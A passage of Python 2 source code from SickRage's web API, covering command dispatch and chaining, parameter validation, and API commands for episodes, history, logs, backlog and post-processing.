args = args[1:]
# set the output callback
# default json
output_callback_dict = {
'default': self._out_as_json,
'image': self._out_as_image,
}
access_msg = u"API :: " + self.request.remote_ip + " - gave correct API KEY. ACCESS GRANTED"
logger.log(access_msg, logger.DEBUG)
# set the original call_dispatcher as the local _call_dispatcher
_call_dispatcher = self.call_dispatcher
# if profile was set wrap "_call_dispatcher" in the profile function
if 'profile' in kwargs:
from profilehooks import profile
_call_dispatcher = profile(_call_dispatcher, immediate=True)
del kwargs["profile"]
try:
out_dict = _call_dispatcher(args, kwargs)
except Exception, e: # real internal error oohhh nooo :(
logger.log(u"API :: " + ex(e), logger.ERROR)
error_data = {
"error_msg": ex(e),
"args": args,
"kwargs": kwargs
}
out_dict = _responds(RESULT_FATAL, error_data,
"SickRage encountered an internal error! Please report to the Devs")
if 'outputType' in out_dict:
output_callback = output_callback_dict[out_dict['outputType']]
else:
output_callback = output_callback_dict['default']
try:
self.finish(output_callback(out_dict))
except Exception:
pass
def _out_as_image(self, _dict):
self.set_header('Content-Type', _dict['image'].get_media_type())
return _dict['image'].get_media()
def _out_as_json(self, _dict):
self.set_header("Content-Type", "application/json;charset=UTF-8")
try:
out = json.dumps(_dict, ensure_ascii=False, sort_keys=True)
callback = self.get_query_argument('callback', None) or self.get_query_argument('jsonp', None)
if callback:
out = callback + '(' + out + ');' # wrap with JSONP call if requested
except Exception, e: # if we fail to generate the output fake an error
logger.log(u"API :: " + traceback.format_exc(), logger.DEBUG)
out = '{"result": "%s", "message": "error while composing output: %s"}' % \
(result_type_map[RESULT_ERROR], ex(e))
return out
def call_dispatcher(self, args, kwargs):
""" calls the appropriate CMD class
looks for a cmd in args and kwargs
or calls the TVDBShorthandWrapper when the first args element is a number
or returns an error that there is no such cmd
"""
logger.log(u"API :: all args: '" + str(args) + "'", logger.DEBUG)
logger.log(u"API :: all kwargs: '" + str(kwargs) + "'", logger.DEBUG)
commands = None
if args:
commands, args = args[0], args[1:]
commands = kwargs.pop("cmd", commands)
out_dict = {}
if commands:
commands = commands.split("|")
multi_commands = len(commands) > 1
for cmd in commands:
cur_args, cur_kwargs = self.filter_params(cmd, args, kwargs)
cmd_index = None # reset per command so a stale index never leaks between iterations
if len(cmd.split("_")) > 1:
cmd, cmd_index = cmd.split("_")
logger.log(u"API :: " + cmd + ": cur_kwargs " + str(cur_kwargs), logger.DEBUG)
if not (cmd in ('show.getbanner', 'show.getfanart', 'show.getnetworklogo', 'show.getposter') and
multi_commands): # skip these cmd while chaining
try:
if cmd in function_mapper:
func = function_mapper.get(cmd) # map function
func.rh = self # add request handler to function
cur_out_dict = func(cur_args, cur_kwargs).run() # call function and get response
elif _is_int(cmd):
cur_out_dict = TVDBShorthandWrapper(cur_args, cur_kwargs, cmd).run()
else:
cur_out_dict = _responds(RESULT_ERROR, "No such cmd: '" + cmd + "'")
except ApiError as error: # Api errors that we raised, they are harmless
cur_out_dict = _responds(RESULT_ERROR, msg=ex(error))
else: # if someone chained one of the forbidden commands they will get an error for this one cmd
cur_out_dict = _responds(RESULT_ERROR, msg="The cmd '" + cmd + "' is not supported while chaining")
if multi_commands:
# note: if duplicate commands are issued and one has an index defined it will override
# all others or the other way around, depending on the command order
# THIS IS NOT A BUG!
if cmd_index: # do we need an index dict for this cmd ?
if cmd not in out_dict:
out_dict[cmd] = {}
out_dict[cmd][cmd_index] = cur_out_dict
else:
out_dict[cmd] = cur_out_dict
else:
out_dict = cur_out_dict
if multi_commands: # if we had multiple commands we have to wrap it in a response dict
out_dict = _responds(RESULT_SUCCESS, out_dict)
else: # index / no cmd given
out_dict = CMD_SickBeard(args, kwargs).run()
return out_dict
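# Illustrative chained request (assumes "sb.ping" and "show.seasonlist" are
# registered in function_mapper at the bottom of this module):
#   /api/<apikey>/?cmd=sb.ping|show.seasonlist&show.seasonlist.indexerid=101501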
def filter_params(self, cmd, args, kwargs):
""" return only params kwargs that are for cmd
and rename them to a clean version (remove "<cmd>_")
args are shared across all commands
all args and kwargs are lowered
cmd are separated by "|" e.g. &cmd=shows|future
kwargs are name-spaced with "." e.g. show.indexerid=101501
if a kwarg has no namespace asking it anyways (global)
full e.g.
/api?apikey=1234&cmd=show.seasonlist_asd|show.seasonlist_2&show.seasonlist_asd.indexerid=101501&show.seasonlist_2.indexerid=79488&sort=asc
two calls of show.seasonlist
one has the index "asd" the other one "2"
the "indexerid" kwargs / params have the indexed cmd as a namespace
and the kwarg / param "sort" is a used as a global
"""
cur_args = []
for arg in args:
cur_args.append(arg.lower())
cur_args = tuple(cur_args)
cur_kwargs = {}
for kwarg in kwargs:
if kwarg.find(cmd + ".") == 0:
clean_key = kwarg.rpartition(".")[2]
cur_kwargs[clean_key] = kwargs[kwarg].lower()
elif "." not in kwarg: # the kwarg was not name-spaced therefore a "global"
cur_kwargs[kwarg] = kwargs[kwarg]
return cur_args, cur_kwargs
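# Worked example for the docstring above (values are illustrative):
#   self.filter_params('show.seasonlist_asd', (), {'show.seasonlist_asd.indexerid': '101501', 'sort': 'asc'})
#   -> ((), {'indexerid': '101501', 'sort': 'asc'})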
class ApiCall(ApiHandler):
_help = {"desc": "This command is not documented. Please report this to the developers."}
def __init__(self, args, kwargs):
# missing
try:
if self._missing:
self.run = self.return_missing
except AttributeError:
pass
# help
if 'help' in kwargs:
self.run = self.return_help
def run(self):
# override with real output function in subclass
return {}
def return_help(self):
try:
if self._requiredParams:
pass
except AttributeError:
self._requiredParams = []
try:
if self._optionalParams:
pass
except AttributeError:
self._optionalParams = []
for paramDict, paramType in [(self._requiredParams, "requiredParameters"),
(self._optionalParams, "optionalParameters")]:
if paramType in self._help:
for paramName in paramDict:
if paramName not in self._help[paramType]:
self._help[paramType][paramName] = {}
if paramDict[paramName]["allowed_values"]:
self._help[paramType][paramName]["allowed_values"] = paramDict[paramName]["allowed_values"]
else:
self._help[paramType][paramName]["allowed_values"] = "see desc"
self._help[paramType][paramName]["defaultValue"] = paramDict[paramName]["defaultValue"]
self._help[paramType][paramName]["type"] = paramDict[paramName]["type"]
elif paramDict:
for paramName in paramDict:
self._help[paramType] = {}
self._help[paramType][paramName] = paramDict[paramName]
else:
self._help[paramType] = {}
msg = "No description available"
if "desc" in self._help:
msg = self._help["desc"]
return _responds(RESULT_SUCCESS, self._help, msg)
def return_missing(self):
if len(self._missing) == 1:
msg = "The required parameter: '" + self._missing[0] + "' was not set"
else:
msg = "The required parameters: '" + "','".join(self._missing) + "' where not set"
return _responds(RESULT_ERROR, msg=msg)
def check_params(self, args, kwargs, key, default, required, arg_type, allowed_values):
""" function to check passed params for the shorthand wrapper
and to detect missing/required params
"""
# auto-select indexer
if key in indexer_ids:
if "tvdbid" in kwargs:
key = "tvdbid"
self.indexer = indexer_ids.index(key)
missing = True
org_default = default
if arg_type == "bool":
allowed_values = [0, 1]
if args:
default = args[0]
missing = False
args = args[1:]
if kwargs.get(key):
default = kwargs.get(key)
missing = False
if required:
try:
self._missing
# update (not replace) the dict so earlier required params are kept
self._requiredParams[key] = {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}
except AttributeError:
self._missing = []
self._requiredParams = {key: {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}}
if missing and key not in self._missing:
self._missing.append(key)
else:
try:
self._optionalParams[key] = {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}
except AttributeError:
self._optionalParams = {key: {"allowed_values": allowed_values,
"defaultValue": org_default,
"type": arg_type}}
if default:
default = self._check_param_type(default, key, arg_type)
if arg_type == "bool":
arg_type = []
self._check_param_value(default, key, allowed_values)
return default, args
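# Sketch of a typical call from a command's __init__ (mirrors CMD_History below):
#   self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
# yields (100, args) when "limit" was not supplied, or the parsed value otherwise.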
def _check_param_type(self, value, name, arg_type):
""" checks if value can be converted / parsed to arg_type
will raise an error on failure
or will convert it to arg_type and return new converted value
can check for:
- int: will be converted into int
- bool: will be converted to False / True
- list: will always return a list
- string: will do nothing for now
- ignore: will ignore it, just like "string"
"""
error = False
if arg_type == "int":
if _is_int(value):
value = int(value)
else:
error = True
elif arg_type == "bool":
if value in ("0", "1"):
value = bool(int(value))
elif value in ("true", "True", "TRUE"):
value = True
elif value in ("false", "False", "FALSE"):
value = False
elif value not in (True, False):
error = True
elif arg_type == "list":
value = value.split("|")
elif arg_type == "string":
pass
elif arg_type == "ignore":
pass
else:
logger.log(u'API :: Invalid param type: "%s" can not be checked. Ignoring it.' % str(arg_type), logger.ERROR)
if error:
# this is a real ApiError !!
raise ApiError(u'param "%s" with given value "%s" could not be parsed into "%s"'
% (str(name), str(value), str(arg_type)))
return value
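# Illustrative conversions:
#   self._check_param_type('1', 'paused', 'bool') -> True
#   self._check_param_type('a|b', 'type', 'list') -> ['a', 'b']
#   self._check_param_type('x', 'limit', 'int')   -> raises ApiError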
def _check_param_value(self, value, name, allowed_values):
""" will check if value (or all values in it ) are in allowed values
will raise an exception if value is "out of range"
if bool(allowed_value) is False a check is not performed and all values are excepted
"""
if allowed_values:
error = False
if isinstance(value, list):
for item in value:
if item not in allowed_values:
error = True
else:
if value not in allowed_values:
error = True
if error:
# this is kinda a ApiError but raising an error is the only way of quitting here
raise ApiError(u"param: '" + str(name) + "' with given value: '" + str(
value) + "' is out of allowed range '" + str(allowed_values) + "'")
class TVDBShorthandWrapper(ApiCall):
_help = {"desc": "This is an internal function wrapper. Call the help command directly for more information."}
def __init__(self, args, kwargs, sid):
self.origArgs = args
self.kwargs = kwargs
self.sid = sid
self.s, args = self.check_params(args, kwargs, "s", None, False, "ignore", [])
self.e, args = self.check_params(args, kwargs, "e", None, False, "ignore", [])
self.args = args
ApiCall.__init__(self, args, kwargs)
def run(self):
""" internal function wrapper """
args = (self.sid,) + self.origArgs
if self.e:
return CMD_Episode(args, self.kwargs).run()
elif self.s:
return CMD_ShowSeasons(args, self.kwargs).run()
else:
return CMD_Show(args, self.kwargs).run()
# ###############################
# helper functions #
# ###############################
def _is_int(data):
try:
int(data)
except (TypeError, ValueError, OverflowError):
return False
else:
return True
def _rename_element(dict_obj, old_key, new_key):
try:
dict_obj[new_key] = dict_obj[old_key]
del dict_obj[old_key]
except (ValueError, TypeError, NameError):
pass
return dict_obj
def _responds(result_type, data=None, msg=""):
"""
result is a string of given "type" (success/failure/timeout/error)
message is a human-readable string, can be empty
data is either a dict or an array, and can be an empty dict or empty array
"""
return {"result": result_type_map[result_type],
"message": msg,
"data": {} if not data else data}
def _get_status_strings(s):
return statusStrings[s]
def _ordinal_to_datetime_form(ordinal):
# workaround for episodes with no air date
if int(ordinal) != 1:
date = datetime.date.fromordinal(ordinal)
else:
return ""
return date.strftime(dateTimeFormat)
def _ordinal_to_date_form(ordinal):
if int(ordinal) != 1:
date = datetime.date.fromordinal(ordinal)
else:
return ""
return date.strftime(dateFormat)
def _history_date_to_datetime_form(time_string):
date = datetime.datetime.strptime(time_string, History.date_format)
return date.strftime(dateTimeFormat)
def _map_quality(show_obj):
quality_map = _get_quality_map()
any_qualities = []
best_qualities = []
i_quality_id, a_quality_id = Quality.splitQuality(int(show_obj))
if i_quality_id:
for quality in i_quality_id:
any_qualities.append(quality_map[quality])
if a_quality_id:
for quality in a_quality_id:
best_qualities.append(quality_map[quality])
return any_qualities, best_qualities
def _get_quality_map():
return {Quality.SDTV: 'sdtv',
Quality.SDDVD: 'sddvd',
Quality.HDTV: 'hdtv',
Quality.RAWHDTV: 'rawhdtv',
Quality.FULLHDTV: 'fullhdtv',
Quality.HDWEBDL: 'hdwebdl',
Quality.FULLHDWEBDL: 'fullhdwebdl',
Quality.HDBLURAY: 'hdbluray',
Quality.FULLHDBLURAY: 'fullhdbluray',
Quality.UNKNOWN: 'unknown'}
def _get_root_dirs():
if sickbeard.ROOT_DIRS == "":
return {}
root_dir = {}
root_dirs = sickbeard.ROOT_DIRS.split('|')
default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
root_dir["default_index"] = int(sickbeard.ROOT_DIRS.split('|')[0])
# remove default_index value from list (this fixes the offset)
root_dirs.pop(0)
if len(root_dirs) < default_index:
return {}
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
default_dir = root_dirs[default_index]
dir_list = []
for root_dir in root_dirs:
valid = 1
try:
ek(os.listdir, root_dir)
except Exception:
valid = 0
default = 0
if root_dir is default_dir:
default = 1
cur_dir = {
'valid': valid,
'location': root_dir,
'default': default
}
dir_list.append(cur_dir)
return dir_list
class ApiError(Exception):
"""
Generic API error
"""
class IntParseError(Exception):
"""
A value could not be parsed into an int, but should be parse-able to an int
"""
# -------------------------------------------------------------------------------------#
class CMD_Help(ApiCall):
_help = {
"desc": "Get help about a given command",
"optionalParameters": {
"subject": {"desc": "The name of the command to get the help of"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.subject, args = self.check_params(args, kwargs, "subject", "help", False, "string", function_mapper.keys())
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get help about a given command """
if self.subject in function_mapper:
out = _responds(RESULT_SUCCESS, function_mapper.get(self.subject)((), {"help": 1}).run())
else:
out = _responds(RESULT_FAILURE, msg="No such cmd")
return out
class CMD_ComingEpisodes(ApiCall):
_help = {
"desc": "Get the coming episodes",
"optionalParameters": {
"sort": {"desc": "Change the sort order"},
"type": {"desc": "One or more categories of coming episodes, separated by |"},
"paused": {
"desc": "0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value"
},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "date", False, "string", ComingEpisodes.sorts.keys())
self.type, args = self.check_params(args, kwargs, "type", '|'.join(ComingEpisodes.categories), False, "list",
ComingEpisodes.categories)
self.paused, args = self.check_params(args, kwargs, "paused", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False,
"bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the coming episodes """
grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused)
data = {section: [] for section in grouped_coming_episodes.keys()}
for section, coming_episodes in grouped_coming_episodes.iteritems():
for coming_episode in coming_episodes:
data[section].append({
'airdate': coming_episode['airdate'],
'airs': coming_episode['airs'],
'ep_name': coming_episode['name'],
'ep_plot': coming_episode['description'],
'episode': coming_episode['episode'],
'indexerid': coming_episode['indexer_id'],
'network': coming_episode['network'],
'paused': coming_episode['paused'],
'quality': coming_episode['quality'],
'season': coming_episode['season'],
'show_name': coming_episode['show_name'],
'show_status': coming_episode['status'],
'tvdbid': coming_episode['tvdbid'],
'weekday': coming_episode['weekday']
})
return _responds(RESULT_SUCCESS, data)
class CMD_Episode(ApiCall):
_help = {
"desc": "Get detailed information about an episode",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"full_path": {
"desc": "Return the full absolute show location (if valid, and True), or the relative show location"
},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
self.fullPath, args = self.check_params(args, kwargs, "full_path", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get detailed information about an episode """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
my_db = db.DBConnection(row_type="dict")
sql_results = my_db.select(
"SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?",
[self.indexerid, self.e, self.s])
if not len(sql_results) == 1:
raise ApiError("Episode not found")
episode = sql_results[0]
# handle path options
# absolute vs relative vs broken
show_path = None
try:
show_path = show_obj.location
except ShowDirectoryNotFoundException:
pass
if not show_path: # show dir is broken ... episode path will be empty
episode["location"] = ""
elif not self.fullPath:
# using the length because lstrip() removes too much
show_path_length = len(show_path) + 1 # the / or \ yeah not that nice i know
episode["location"] = episode["location"][show_path_length:]
# convert stuff to human form
if helpers.tryInt(episode['airdate'], 1) > 693595: # 1900
episode['airdate'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(int(episode['airdate']), show_obj.airs, show_obj.network)), d_preset=dateFormat)
else:
episode['airdate'] = 'Never'
status, quality = Quality.splitCompositeStatus(int(episode["status"]))
episode["status"] = _get_status_strings(status)
episode["quality"] = get_quality_string(quality)
episode["file_size_human"] = pretty_file_size(episode["file_size"])
return _responds(RESULT_SUCCESS, episode)
class CMD_EpisodeSearch(ApiCall):
_help = {
"desc": "Search for an episode. The response might take some time.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for an episode """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# retrieve the episode object and fail if we can't get one
ep_obj = show_obj.getEpisode(int(self.s), int(self.e))
if isinstance(ep_obj, str):
return _responds(RESULT_FAILURE, msg="Episode not found")
# make a queue item for it and put it on the queue
ep_queue_item = search_queue.ManualSearchQueueItem(show_obj, ep_obj)
sickbeard.searchQueueScheduler.action.add_item(ep_queue_item) # @UndefinedVariable
# wait until the queue item tells us whether it worked or not
while ep_queue_item.success is None: # @UndefinedVariable
time.sleep(1)
# return the correct json value
if ep_queue_item.success:
status, quality = Quality.splitCompositeStatus(ep_obj.status) # @UnusedVariable
# TODO: split quality and status?
return _responds(RESULT_SUCCESS, {"quality": get_quality_string(quality)},
"Snatched (" + get_quality_string(quality) + ")")
return _responds(RESULT_FAILURE, msg='Unable to find episode')
class CMD_EpisodeSetStatus(ApiCall):
_help = {
"desc": "Set the status of an episode or a season (when no episode is provided)",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"status": {"desc": "The status of the episode or season"}
},
"optionalParameters": {
"episode": {"desc": "The episode number"},
"force": {"desc": "True to replace existing downloaded episode or season, False otherwise"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.status, args = self.check_params(args, kwargs, "status", None, True, "string",
["wanted", "skipped", "ignored", "failed"])
# optional
self.e, args = self.check_params(args, kwargs, "episode", None, False, "int", [])
self.force, args = self.check_params(args, kwargs, "force", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set the status of an episode or a season (when no episode is provided) """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# convert the string status to a int
for status in statusStrings:
if str(statusStrings[status]).lower() == str(self.status).lower():
self.status = status
break
else: # if we don't break out of the for loop we end up here.
# the allowed values has at least one item that could not be matched against the internal status strings
raise ApiError("The status string could not be matched to a status. Report to Devs!")
ep_list = []
if self.e:
ep_obj = show_obj.getEpisode(self.s, self.e)
if not ep_obj:
return _responds(RESULT_FAILURE, msg="Episode not found")
ep_list = [ep_obj]
else:
# get all episode numbers from self, season
ep_list = show_obj.getAllEpisodes(season=self.s)
def _ep_result(result_code, ep, msg=""):
return {'season': ep.season, 'episode': ep.episode, 'status': _get_status_strings(ep.status),
'result': result_type_map[result_code], 'message': msg}
ep_results = []
failure = False
start_backlog = False
segments = {}
sql_l = []
for ep_obj in ep_list:
with ep_obj.lock:
if self.status == WANTED:
# figure out what episodes are wanted so we can backlog them
if ep_obj.season in segments:
segments[ep_obj.season].append(ep_obj)
else:
segments[ep_obj.season] = [ep_obj]
# don't let them mess up UN-AIRED episodes
if ep_obj.status == UNAIRED:
if self.e is not None: # setting the status of an un-aired is only considered a failure if we directly wanted this episode, but is ignored on a season request
ep_results.append(
_ep_result(RESULT_FAILURE, ep_obj, "Refusing to change status because it is UN-AIRED"))
failure = True
continue
if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS:
ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, "Refusing to change status to FAILED because failed download handling is disabled"))
failure = True
continue
# allow the user to force setting the status for an already downloaded episode
if ep_obj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force:
ep_results.append(_ep_result(RESULT_FAILURE, ep_obj, "Refusing to change status because it is already marked as DOWNLOADED"))
failure = True
continue
ep_obj.status = self.status
sql_l.append(ep_obj.get_sql())
if self.status == WANTED:
start_backlog = True
ep_results.append(_ep_result(RESULT_SUCCESS, ep_obj))
if len(sql_l) > 0:
my_db = db.DBConnection()
my_db.mass_action(sql_l)
extra_msg = ""
if start_backlog:
for season, segment in segments.iteritems():
cur_backlog_queue_item = search_queue.BacklogQueueItem(show_obj, segment)
sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item) # @UndefinedVariable
logger.log(u"API :: Starting backlog for " + show_obj.name + " season " + str(
season) + " because some episodes were set to WANTED")
extra_msg = " Backlog started"
if failure:
return _responds(RESULT_FAILURE, ep_results, 'Failed to set all or some status. Check data.' + extra_msg)
else:
return _responds(RESULT_SUCCESS, msg='All status set successfully.' + extra_msg)
class CMD_SubtitleSearch(ApiCall):
_help = {
"desc": "Search for an episode subtitles. The response might take some time.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"season": {"desc": "The season number"},
"episode": {"desc": "The episode number"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for an episode subtitles """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# retrieve the episode object and fail if we can't get one
ep_obj = show_obj.getEpisode(int(self.s), int(self.e))
if isinstance(ep_obj, str):
return _responds(RESULT_FAILURE, msg="Episode not found")
# try to download subtitles for that episode
previous_subtitles = ep_obj.subtitles
try:
subtitles = ep_obj.download_subtitles()
except Exception:
return _responds(RESULT_FAILURE, msg='Unable to find subtitles')
# return the correct json value
new_subtitles = frozenset(ep_obj.subtitles).difference(previous_subtitles)
if new_subtitles:
new_languages = [subtitles.name_from_code(code) for code in new_subtitles]
status = 'New subtitles downloaded: %s' % ', '.join(new_languages)
response = _responds(RESULT_SUCCESS, msg='New subtitles found')
else:
status = 'No subtitles downloaded'
response = _responds(RESULT_FAILURE, msg='Unable to find subtitles')
ui.notifications.message('Subtitles Search', status)
return response
class CMD_Exceptions(ApiCall):
_help = {
"desc": "Get the scene exceptions for all or a given show",
"optionalParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the scene exceptions for all or a given show """
my_db = db.DBConnection("cache.db", row_type="dict")
if self.indexerid is None:
sql_results = my_db.select("SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions")
scene_exceptions = {}
for row in sql_results:
indexerid = row["indexerid"]
if indexerid not in scene_exceptions:
scene_exceptions[indexerid] = []
scene_exceptions[indexerid].append(row["show_name"])
else:
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
sql_results = my_db.select(
"SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions WHERE indexer_id = ?",
[self.indexerid])
scene_exceptions = []
for row in sql_results:
scene_exceptions.append(row["show_name"])
return _responds(RESULT_SUCCESS, scene_exceptions)
class CMD_History(ApiCall):
_help = {
"desc": "Get the downloaded and/or snatched history",
"optionalParameters": {
"limit": {"desc": "The maximum number of results to return"},
"type": {"desc": "Only get some entries. No value will returns every type"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
self.type, args = self.check_params(args, kwargs, "type", None, False, "string", ["downloaded", "snatched"])
self.type = self.type.lower() if isinstance(self.type, str) else ''
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the downloaded and/or snatched history """
data = History().get(self.limit, self.type)
results = []
for row in data:
status, quality = Quality.splitCompositeStatus(int(row["action"]))
status = _get_status_strings(status)
if self.type and not status.lower() == self.type:
continue
row["status"] = status
row["quality"] = get_quality_string(quality)
row["date"] = _history_date_to_datetime_form(str(row["date"]))
del row["action"]
_rename_element(row, "show_id", "indexerid")
row["resource_path"] = ek(os.path.dirname, row["resource"])
row["resource"] = ek(os.path.basename, row["resource"])
# Add tvdbid for backward compatibility
row['tvdbid'] = row['indexerid']
results.append(row)
return _responds(RESULT_SUCCESS, results)
class CMD_HistoryClear(ApiCall):
_help = {"desc": "Clear the entire history"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Clear the entire history """
History().clear()
return _responds(RESULT_SUCCESS, msg="History cleared")
class CMD_HistoryTrim(ApiCall):
_help = {"desc": "Trim history entries older than 30 days"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Trim history entries older than 30 days """
History().trim()
return _responds(RESULT_SUCCESS, msg='Removed history entries older than 30 days')
class CMD_Failed(ApiCall):
_help = {
"desc": "Get the failed downloads",
"optionalParameters": {
"limit": {"desc": "The maximum number of results to return"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the failed downloads """
my_db = db.DBConnection('failed.db', row_type="dict")
u_limit = min(int(self.limit), 100)
if u_limit == 0:
sql_results = my_db.select("SELECT * FROM failed")
else:
sql_results = my_db.select("SELECT * FROM failed LIMIT ?", [u_limit])
return _responds(RESULT_SUCCESS, sql_results)
class CMD_Backlog(ApiCall):
_help = {"desc": "Get the backlogged episodes"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the backlogged episodes """
shows = []
my_db = db.DBConnection(row_type="dict")
for curShow in sickbeard.showList:
show_eps = []
sql_results = my_db.select(
"SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC",
[curShow.indexerid])
for curResult in sql_results:
cur_ep_cat = curShow.getOverview(int(curResult["status"] or -1))
if cur_ep_cat and cur_ep_cat in (Overview.WANTED, Overview.QUAL):
show_eps.append(curResult)
if show_eps:
shows.append({
"indexerid": curShow.indexerid,
"show_name": curShow.name,
"status": curShow.status,
"episodes": show_eps
})
return _responds(RESULT_SUCCESS, shows)
class CMD_Logs(ApiCall):
_help = {
"desc": "Get the logs",
"optionalParameters": {
"min_level": {
"desc":
"The minimum level classification of log entries to return. "
"Each level inherits its above levels: debug < info < warning < error"
},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.min_level, args = self.check_params(args, kwargs, "min_level", "error", False, "string",
["error", "warning", "info", "debug"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the logs """
# 10 = Debug / 20 = Info / 30 = Warning / 40 = Error
min_level = logger.reverseNames[str(self.min_level).upper()]
data = []
if ek(os.path.isfile, logger.logFile):
with io.open(logger.logFile, 'r', encoding='utf-8') as f:
data = f.readlines()
regex = r"^(\d\d\d\d)\-(\d\d)\-(\d\d)\s*(\d\d)\:(\d\d):(\d\d)\s*([A-Z]+)\s*(.+?)\s*\:\:\s*(.*)$"
final_data = []
num_lines = 0
last_line = False
num_to_show = min(50, len(data))
for x in reversed(data):
match = re.match(regex, x)
if match:
level = match.group(7)
if level not in logger.reverseNames:
last_line = False
continue
if logger.reverseNames[level] >= min_level:
last_line = True
final_data.append(x.rstrip("\n"))
else:
last_line = False
continue
elif last_line:
final_data.append("AA" + x)
num_lines += 1
if num_lines >= num_to_show:
break
return _responds(RESULT_SUCCESS, final_data)
class CMD_PostProcess(ApiCall):
_help = {
"desc": "Manually post-process the files in the download folder",
"optionalParameters": {
"path": {"desc": "The path to the folder to post-process"},
"force_replace": {"desc": "Force already post-processed files to be post-processed again"},
"return_data": {"desc": "Returns the result of the post-process"},
"process_method": {"desc": "How should valid post-processed files be handled"},
"is_priority": {"desc": "Replace the file even if it exists in a higher quality"},
"failed": {"desc": "Mark download as failed"},
"type": {"desc": "The type of post-process being requested"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.path, args = self.check_params(args, kwargs, "path", None, False, "string", [])
self.force_replace, args = self.check_params(args, kwargs, "force_replace", False, False, "bool", [])
